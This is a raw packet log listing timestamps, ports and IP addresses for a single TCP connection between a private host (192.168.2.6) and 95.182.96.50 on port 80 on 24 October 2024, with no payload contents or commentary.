Oct 24, 2024 13:54:16.512172937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512209892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512217045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512254000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512262106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512305975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512306929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512348890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512357950 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512407064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512414932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512449980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512453079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512489080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512501955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512520075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512528896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512576103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512594938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512629032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512641907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512665033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512670994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512701035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512702942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512734890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512747049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512772083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512774944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512814045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512819052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512856960 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512867928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512902021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512913942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512942076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.512953043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512984037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.512989998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513036013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513051033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513072014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513077974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513107061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513111115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513149023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513151884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513185978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513194084 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513221979 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513227940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513256073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513286114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513293982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513293982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513330936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513334036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513366938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513370991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513400078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513405085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513434887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513439894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513468981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513478994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513501883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513511896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513535023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513542891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513570070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513571024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513603926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513608932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513641119 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513645887 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513674974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513689041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513709068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.513720036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.513747931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.551794052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.551867008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.551884890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.551918030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.551920891 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.551954985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.551966906 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.551990986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.551997900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.552026033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.552036047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.552069902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.552079916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.552114010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.552124023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.552150011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.552165985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.552180052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.552196980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.552234888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.625221014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.625279903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.625302076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.625315905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.625329018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.625351906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.625366926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.625392914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.625406027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.625447035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.625463009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.625498056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.625505924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.625533104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.625536919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.625574112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626411915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626463890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626465082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626511097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626535892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626571894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626589060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626606941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626615047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626641989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626647949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626678944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626683950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626713991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626718998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626760960 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626770020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626801014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626806974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626840115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626843929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626878023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626878977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626918077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.626931906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626967907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.626980066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627002954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627007961 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627039909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627043009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627074003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627077103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627114058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627223015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627252102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627273083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627293110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627342939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627394915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627399921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627430916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627440929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627473116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627486944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627521992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627530098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627558947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627607107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627643108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627655983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627677917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627684116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627715111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627721071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627757072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627773046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627816916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627827883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627876043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627882004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627918005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.627923965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627958059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.627971888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628006935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628021002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628047943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628065109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628098965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628108978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628129959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628138065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628165960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628170013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628206968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628222942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628272057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628274918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628309965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628315926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628345013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628350973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628386974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628431082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628464937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628477097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628499985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628504038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628535986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628540039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628571033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628576994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628604889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628607035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628645897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628655910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628695965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628705025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628740072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628746033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628772974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628781080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628808975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628813982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628845930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628849030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628881931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628885031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628916979 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628931046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628951073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628957033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.628988028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.628992081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.629025936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:16.629029036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.629067898 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.957834005 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:16.963258982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:17.258574963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:17.258641005 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:17.350600004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:17.355998993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:17.615045071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:17.615123987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:18.302691936 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:18.308060884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:18.560820103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:18.560904980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.036829948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.042180061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.265535116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.265571117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.265599012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.265608072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.265626907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.265645027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.265667915 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.265676975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.265688896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.265712976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.265723944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.265750885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.265757084 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.265794039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.266022921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.266078949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.266098976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.266117096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.266140938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.266154051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.266158104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.266195059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.266205072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.266231060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.266242981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.266268969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.266273975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.266307116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.266311884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.266349077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.380825996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.380894899 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.380896091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.380937099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.380940914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.380975008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381011009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381022930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381030083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381066084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381076097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381191969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381237984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381247997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381299973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381305933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381345034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381392002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381402969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381439924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381448984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381498098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381542921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381551027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381592035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381627083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381640911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381640911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381665945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381675005 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381705999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381738901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381747007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381776094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381787062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381812096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381817102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381848097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381851912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381882906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381887913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381918907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381923914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381953955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381973028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.381989002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.381994009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.382030010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496155024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496228933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496231079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496274948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496290922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:19.496345997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:19.496347904 CEST	80	49714	95.182.96.50	192.168.2.6
